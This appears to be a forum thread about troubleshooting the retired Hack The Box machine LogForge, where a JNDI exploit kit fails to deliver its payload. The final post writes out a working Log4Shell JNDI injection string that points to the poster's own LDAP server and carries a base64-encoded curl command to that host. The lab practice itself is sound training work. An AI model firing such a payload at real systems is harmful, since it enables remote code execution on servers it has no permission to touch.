LogForge Help

I’ve been going through some retired HTB boxes and was trying to do LogForge using HTB’s PwnBox. I get up to the point where I’m using the ****-Exploit-Kit and I have the payload ready to go. However, when using the exploit, tcpdump will say it connects correctly to the **AP server then redirect to port 8081 for a subsequent payload but that last redirection doesn’t happen at all. ****-Exploit-Kit doesn’t send the payload. I’m not sure if anyone else has had any luck using PwnBox for this machine. I also tried using a personal Parrot VM but hit the same problem. I’m following a walkthrough/write-up and the exploit kit should be sending the payload right after it says “redirecting to XYZ”.

I don’t have the walk-through to reference… from my notes if I am looking at the right part anyway, it looks like I used the kit to generate the payload (assuming your talking about the JNDI exploit kit? ) and then either use Burp or tomcat to actually send the payload. Hopefully that makes sense/helps. Also if you didn’t already I would highly recommend watching ippsec’s video on youtube of the box.

I tried to use Burp to send the payload and I also tried doing it directly via the web GUI. I have watched Ippsec’s video and I was hoping to follow it because his stuff is really good and detailed. I wasn’t able to get the same results as him though. Maybe I’ll try again another time.

1 Like

Same issue here. I can’t replicate the walkthroughs… :frowning:

I followed ippsec’s video walkthrough and just like @_dials , it says “redirecting to port 8081…” instead of displaying the serialized payload like in ippsec’s video.

I was able to get it to display the serialized payload by utilizing the dynamic generation functionality of the ****-Exploit-Kit, like this:

${jndi:ldap://10.10.14.3:1389/serial/CommonsCollections5/exec_unix/Y3VybCAxMC4xMC4xNC4zOjkwMDIK}

However, it doesn’t look like it ever executes the payload server-side (I didn’t see any ICMP packets come back in tcpdump)